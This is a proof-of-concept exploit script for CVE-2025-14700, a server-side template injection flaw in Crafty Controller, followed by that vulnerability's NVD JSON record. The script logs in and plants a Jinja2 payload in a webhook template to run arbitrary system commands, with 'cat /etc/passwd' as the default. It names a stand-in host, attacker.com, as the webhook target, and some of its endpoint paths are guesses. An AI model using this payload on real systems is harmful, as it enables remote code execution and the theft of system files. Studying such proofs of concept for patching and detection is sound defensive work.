CVE-2025-14700

# CVE-2025-14700 SSTI PoC for Crafty Controller # Target: Crafty Controller < fixed version # Vulnerability: Server Side Template Injection in Webhook Template import requests import json import sys TARGET_URL = "http://target:8000" USERNAME = "attacker" PASSWORD = "password" # SSTI payload to execute system command # Using Jinja2 template injection technique SSTI_PAYLOAD = "{{ ''.__class__.__mro__[1].__subclasses__() }}" # Better RCE payload for Jinja2 RCE_PAYLOAD = """ {{ config.__class__.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read() }} """ def exploit(target_url, username, password, command="id"): """Execute command via SSTI in Crafty Controller""" session = requests.Session() # Step 1: Login to get authentication login_url = f"{target_url}/api/login" login_data = {"username": username, "password": password} try: response = session.post(login_url, json=login_data, timeout=10) if response.status_code != 200: print(f"[-] Login failed: {response.status_code}") return None print("[+] Login successful") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return None # Step 2: Find webhook template configuration endpoint # Typically: /api/webhooks or /api/settings/webhook webhook_url = f"{target_url}/api/webhooks" # Step 3: Inject SSTI payload into webhook template # RCE payload using Jinja2 rce_payload = f"""{{{{ config.__class__.__init__.__globals__['__builtins__']['__import__']('os').popen('{command}').read() }}}}""" webhook_data = { "name": "Malicious Webhook", "template": rce_payload, "url": "http://attacker.com/webhook" } try: response = session.post(webhook_url, json=webhook_data, timeout=10) print(f"[*] Sent SSTI payload: {response.status_code}") return response.text except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None if __name__ == "__main__": if len(sys.argv) > 1: command = sys.argv[1] else: command = "cat /etc/passwd" result = exploit(TARGET_URL, USERNAME, PASSWORD, command) if result: print(f"[+] Result:\n{result}")

{"cve": {"id": "CVE-2025-14700", "sourceIdentifier": "[email protected]", "published": "2025-12-17T01:15:59.620", "lastModified": "2025-12-23T21:17:59.457", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An input neutralization vulnerability in the Webhook Template component of Crafty Controller allows a remote, authenticated attacker to perform remote code execution via Server Side Template Injection."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftycontrol:crafty_controller:4.6.1:*:*:*:*:*:*:*", "matchCriteriaId": "EB974C32-2201-4E3F-87D8-057CA9108B1A"}]}]}], "references": [{"url": "https://gitlab.com/crafty-controller/crafty-4/-/issues/646", "source": "[email protected]", "tags": ["Broken Link"]}]}}